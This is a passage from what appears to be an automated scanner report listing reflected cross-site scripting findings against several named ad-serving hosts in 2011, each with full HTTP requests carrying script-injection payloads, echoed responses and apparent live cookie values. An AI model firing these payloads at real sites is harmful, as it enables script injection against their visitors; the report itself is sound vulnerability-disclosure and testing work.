Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 441
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:22:16 GMT
Expires: Mon, 09 May 2011 16:22:16 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/g;225017382;0-0;0;36378894;255-0/0;36796821/36814699/1;;~okv=;sym=82eb8'-alert(1)-'3103ce12c94;~aopt=2/1/ff/1;~sscs=%3fhttp://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_WhatIsWorkingNow?dist=IAEHM1AFW">
...[SNIP]...

2.27. http://ad.doubleclick.net/adj/tsc-headlines-and-perspectives/financial-services [storyid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/adj/tsc-headlines-and-perspectives/financial-services

Issue detail

The value of the storyid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a1fe'%3bad115a032ee was submitted in the storyid parameter. This input was echoed as 3a1fe';ad115a032ee in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /adj/tsc-headlines-and-perspectives/financial-services;storyid=3a1fe'%3bad115a032ee HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 485
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:17:13 GMT
Expires: Mon, 09 May 2011 16:17:13 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/z;239995412;1-0;0;60876969;4252-336/280;41981480/41999267/1;;~aopt=0/ff/9c/ff;~fdr=237636572;0-0;0;23865896;4252-336/280;41004493/41022280/1;;~okv=;storyid=3a1fe';ad115a032ee;~aopt=2/1/9c/0;~sscs=%3fhttps://www.tradestation.com/newaccount/preaccount_default.aspx">
...[SNIP]...

2.28. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be2b3</script><script>alert(1)</script>73b0105ce06 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935?keywords=MS&click=http%3A%2F%2Famericanbankingnews.us.intellitxt.com%2Fal.asp%3Fts%3D20110509161820%26at%3D122%26ipid%3D28338%26di%3D28583000%26syid%3D0%26adid%3D46353%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Dc854bd2356afa76e7e50ed49496779a5%26ll%3D0%26hbll%3D0%26id%3D98D142F7AB3F4378B788D5E618179704%26idh%3D2459b26c9bcb8d62a3e861e99f40e4c2%26pvu%3D8217DE1248D64533B8B83DE91BBC70C0%26pvm%3D3d6edce620bb5fe69529836dea4f1e0c%26uf%3D128%26ur%3D39296%26llip%3D0%26ttv%3D1%26redir%3Dbe2b3</script><script>alert(1)</script>73b0105ce06 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=68:1547:811:3:0:41715:1304957840:B2|46:566:480:0:0:41593:1304694497:B2|19:1543:1127:0:0:45688:1304557105:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 09 May 2011 16:20:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2976

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
3F4378B788D5E618179704%26idh%3D2459b26c9bcb8d62a3e861e99f40e4c2%26pvu%3D8217DE1248D64533B8B83DE91BBC70C0%26pvm%3D3d6edce620bb5fe69529836dea4f1e0c%26uf%3D128%26ur%3D39296%26llip%3D0%26ttv%3D1%26redir%3Dbe2b3</script><script>alert(1)</script>73b0105ce06">
...[SNIP]...

2.29. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d577</script><script>alert(1)</script>82af55b47cb was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935?keywords=MS8d577</script><script>alert(1)</script>82af55b47cb&click=http%3A%2F%2Famericanbankingnews.us.intellitxt.com%2Fal.asp%3Fts%3D20110509161820%26at%3D122%26ipid%3D28338%26di%3D28583000%26syid%3D0%26adid%3D46353%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Dc854bd2356afa76e7e50ed49496779a5%26ll%3D0%26hbll%3D0%26id%3D98D142F7AB3F4378B788D5E618179704%26idh%3D2459b26c9bcb8d62a3e861e99f40e4c2%26pvu%3D8217DE1248D64533B8B83DE91BBC70C0%26pvm%3D3d6edce620bb5fe69529836dea4f1e0c%26uf%3D128%26ur%3D39296%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=68:1547:811:3:0:41715:1304957840:B2|46:566:480:0:0:41593:1304694497:B2|19:1543:1127:0:0:45688:1304557105:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 09 May 2011 16:20:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/1304958043**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?keywords=MS8d577</script><script>alert(1)</script>82af55b47cb&click=http%3A%2F%2Famericanbankingnews.us.intellitxt.com%2Fal.asp%3Fts%3D20110509161820%26at%3D122%26ipid%3D28338%26di%3D28583000%26syid%3D0%26adid%3D46353%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Dc854bd
...[SNIP]...

2.30. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de3db</script><script>alert(1)</script>c6a66b6274d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935?keywords=MS&click=http%3A%2F%2Famericanbankingnews.us.intellitxt.com%2Fal.asp%3Fts%3D20110509161820%26at%3D122%26ipid%3D28338%26di%3D28583000%26syid%3D0%26adid%3D46353%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Dc854bd2356afa76e7e50ed49496779a5%26ll%3D0%26hbll%3D0%26id%3D98D142F7AB3F4378B788D5E618179704%26idh%3D2459b26c9bcb8d62a3e861e99f40e4c2%26pvu%3D8217DE1248D64533B8B83DE91BBC70C0%26pvm%3D3d6edce620bb5fe69529836dea4f1e0c%26uf%3D128%26ur%3D39296%26llip%3D0%26ttv%3D1%26redir%3D&de3db</script><script>alert(1)</script>c6a66b6274d=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.americanbankingnews.com/2011/05/09/morgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=68:1547:811:3:0:41715:1304957840:B2|46:566:480:0:0:41593:1304694497:B2|19:1543:1127:0:0:45688:1304557105:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 09 May 2011 16:20:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2982

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
F4378B788D5E618179704%26idh%3D2459b26c9bcb8d62a3e861e99f40e4c2%26pvu%3D8217DE1248D64533B8B83DE91BBC70C0%26pvm%3D3d6edce620bb5fe69529836dea4f1e0c%26uf%3D128%26ur%3D39296%26llip%3D0%26ttv%3D1%26redir%3D&de3db</script><script>alert(1)</script>c6a66b6274d=1">
...[SNIP]...

2.31. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 473ab'%3balert(1)//5be96541309 was submitted in the admeld_adprovider_id parameter. This input was echoed as 473ab';alert(1)//5be96541309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73473ab'%3balert(1)//5be96541309&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2xpe64Z76BY; 2=2xpe64Z76BY; 2=2xpe64Z76BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 09 May 2011 16:17:56 GMT
Expires: Mon, 09 May 2011 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73473ab';alert(1)//5be96541309&external_user_id=3419824627245671268"/>');

2.32. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b11'%3balert(1)//099017c794e was submitted in the admeld_callback parameter. This input was echoed as 65b11';alert(1)//099017c794e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match65b11'%3balert(1)//099017c794e HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=2xpe64Z76BY; 2=2xpe64Z76BY; 2=2xpe64Z76BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
P3P: CP=NOI ADM DEV CUR
Date: Mon, 09 May 2011 16:17:56 GMT
Expires: Mon, 09 May 2011 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Set-Cookie: 2=2xpe64Z76BY; Domain=.lucidmedia.com; Expires=Tue, 08-May-2012 16:17:57 GMT
Content-Type: text/plain
Content-Length: 192
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match65b11';alert(1)//099017c794e?admeld_adprovider_id=73&external_user_id=3419824627245671268"/>');

2.33. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4e5f5<script>alert(1)</script>c23a487d516 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341527&pid=8797684e5f5<script>alert(1)</script>c23a487d516&ps=-1&zw=600&zh=280&url=http%3A//www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html%3Fcm_ven%3DGOOGLEN&v=5&dct=Citigroup%20Shares%20Should%20be%20Avoided%3A%20Analyst%20-%20TheStreet&metakw=Financial,News,Stock,Market,Headlines,Investments,Quotes,Trading,TheStreet.com,Maria%20Woehr HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C60512%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C57094%7C50961%7C52841%7C51182%7C56419%7C56148%7C57362%7C56673%7C56835%7C60203%7C51186%7C56780%7C50220%7C56768%7C56299%7C56987%7C56969%7C54057%7C50229%7C54063%7C57144%7C60183%7C60130%7C53615_Thu%2C%2005%20May%202011%2005%3A58%3A23%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:36 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2536

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "8797684e5f5<script>alert(1)</script>c23a487d516"


                                                           </head>
...[SNIP]...

2.34. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 9feed--><script>alert(1)</script>1d445329e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=13415279feed--><script>alert(1)</script>1d445329e&pid=879768&ps=-1&zw=600&zh=280&url=http%3A//www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html%3Fcm_ven%3DGOOGLEN&v=5&dct=Citigroup%20Shares%20Should%20be%20Avoided%3A%20Analyst%20-%20TheStreet&metakw=Financial,News,Stock,Market,Headlines,Investments,Quotes,Trading,TheStreet.com,Maria%20Woehr HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C60512%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C57094%7C50961%7C52841%7C51182%7C56419%7C56148%7C57362%7C56673%7C56835%7C60203%7C51186%7C56780%7C50220%7C56768%7C56299%7C56987%7C56969%7C54057%7C50229%7C54063%7C57144%7C60183%7C60130%7C53615_Thu%2C%2005%20May%202011%2005%3A58%3A23%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:34 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3393

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>1d445329e" -->
...[SNIP]...

2.35. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload bdc41--><script>alert(1)</script>901e5b0b524 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1341527&pid=879768&ps=-1bdc41--><script>alert(1)</script>901e5b0b524&zw=600&zh=280&url=http%3A//www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html%3Fcm_ven%3DGOOGLEN&v=5&dct=Citigroup%20Shares%20Should%20be%20Avoided%3A%20Analyst%20-%20TheStreet&metakw=Financial,News,Stock,Market,Headlines,Investments,Quotes,Trading,TheStreet.com,Maria%20Woehr HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/11111015/1/citigroup-shares-should-be-avoided-analyst.html?cm_ven=GOOGLEN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C53380%7C60490%7C60512%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C57094%7C50961%7C52841%7C51182%7C56419%7C56148%7C57362%7C56673%7C56835%7C60203%7C51186%7C56780%7C50220%7C56768%7C56299%7C56987%7C56969%7C54057%7C50229%7C54063%7C57144%7C60183%7C60130%7C53615_Thu%2C%2005%20May%202011%2005%3A58%3A23%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:17:40 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3838

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>901e5b0b524" -->

...[SNIP]...

2.36. http://adsfac.eu/ag.asp [cc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adsfac.eu
Path:	/ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 4bbdd<script>alert(1)</script>a8288bbc8ce was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=4bbdd<script>alert(1)</script>a8288bbc8ce&source=js&ord=[timestamp] HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
Referer: http://www.sys-con.com/node/1824456
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Mon, 09 May 2011 16:16:18 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FS4bbdd%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea8288bbc8ce0=uid=54792259; expires=Tue, 10-May-2011 16:17:18 GMT; path=/
Set-Cookie: FS4bbdd%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea8288bbc8ce=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4146&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Thu, 09-Jun-2011 16:17:18 GMT; path=/
P3P: CP="NOI DSP COR NID"
Date: Mon, 09 May 2011 16:17:17 GMT

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.eu/link.asp?cc=4bbdd<script>alert(1)</script>a8288bbc8ce.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

2.37. http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-1844-30

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f07f3'-alert(1)-'3f3ce45e8c5 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-1844-30?mpt=[CACHEBUSTER]f07f3'-alert(1)-'3f3ce45e8c5&mpvc= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://addelivery.thestreet.com/afr.php?zoneid=15&ActiveProducts=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
